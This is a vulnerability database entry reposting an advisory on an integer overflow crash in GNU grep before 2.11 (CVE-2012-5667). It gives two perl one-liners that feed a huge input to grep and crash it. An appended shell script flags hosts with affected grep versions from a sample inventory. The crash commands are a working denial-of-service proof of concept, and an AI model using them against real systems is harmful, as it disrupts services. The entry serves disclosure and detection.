seebug | Root | SSV:77529
History: Jul 01, 2014 - 12:00 a.m.

Grep < 2.11 Integer Overflow Crash PoC

EPSS: 0.007 (Low), Percentile: 80.8%

No description provided by source.


Grep <2.11 is vulnerable to int overflow exploitation.

http://lists.gnu.org/archive/html/bug-grep/2012-03/msg00007.html

Although it is patched in the recent Grep, this update has not been
pushed to the Ubuntu repos, or the Red Hat repos, leaving 99% of those
OS's (and more) vulnerable.


There are also many other ways to do this bug.

It is low severity because it would be extremely hard to actually
exploit it, and it is a local exploit, and it is not run by root.

Found By: Security Researcher - Joshua Rogers


More:
https://bugzilla.redhat.com/show_bug.cgi?id=889935
https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473
http://seclists.org/oss-sec/2012/q4/504
etc.

#There are many ways of doing this.

#Method one:
$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
Segmentation fault (core dumped)


#Method two:
$ perl -e 'print "\nx"x(2**31)' | grep -c x > /dev/null


Twitter: https://twitter.com/MegaManSec


CVE: CVE-2012-5667
-- 
*Joshua Rogers* - Retro Game Collector && IT Security Specialist
gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg>
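
Added example, not part of the original advisory: a shell check that classifies `grep --version` banners against the "< 2.11" bound in the title, so hosts still carrying an affected GNU grep can be listed for follow-up. The function names, the `host|banner` inventory format and the sample hosts are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the advisory): flag GNU grep builds older than 2.11.

# grep_banner_affected BANNER
#   returns 0 = GNU grep older than 2.11
#           1 = GNU grep 2.11 or newer
#           2 = banner is not a recognisable GNU grep banner
grep_banner_affected() {
    # The first banner line looks like: "grep (GNU grep) 2.10"
    ver=$(printf '%s\n' "$1" |
          sed -n '1s/^.*(GNU grep) \([0-9][0-9]*\)\.\([0-9][0-9]*\).*$/\1 \2/p')
    if [ -z "$ver" ]; then return 2; fi
    major=${ver% *}
    minor=${ver#* }
    if [ "$major" -lt 2 ]; then return 0; fi
    if [ "$major" -eq 2 ] && [ "$minor" -lt 11 ]; then return 0; fi
    return 1
}

# affected_hosts: reads "host|banner" lines on stdin and prints the hosts
# that need follow-up ("affected") or manual review ("unknown").
affected_hosts() {
    while IFS='|' read -r host banner; do
        rc=0
        grep_banner_affected "$banner" || rc=$?
        case $rc in
            0) printf '%s affected\n' "$host" ;;
            2) printf '%s unknown\n' "$host" ;;
        esac
    done
}

# Constructed sample inventory (host names and banners are made up).
SAMPLE_INVENTORY='web01|grep (GNU grep) 2.10
db01|grep (GNU grep) 2.5.4
build01|grep (GNU grep) 2.11
dev01|grep (GNU grep) 3.4
bsd01|grep (BSD grep) 2.5.1-FreeBSD'

printf '%s\n' "$SAMPLE_INVENTORY" | affected_hosts
```

Distribution packages can carry a backported fix under an older upstream version string, so confirm an "affected" result against the vendor's advisory for CVE-2012-5667 before treating the host as unpatched.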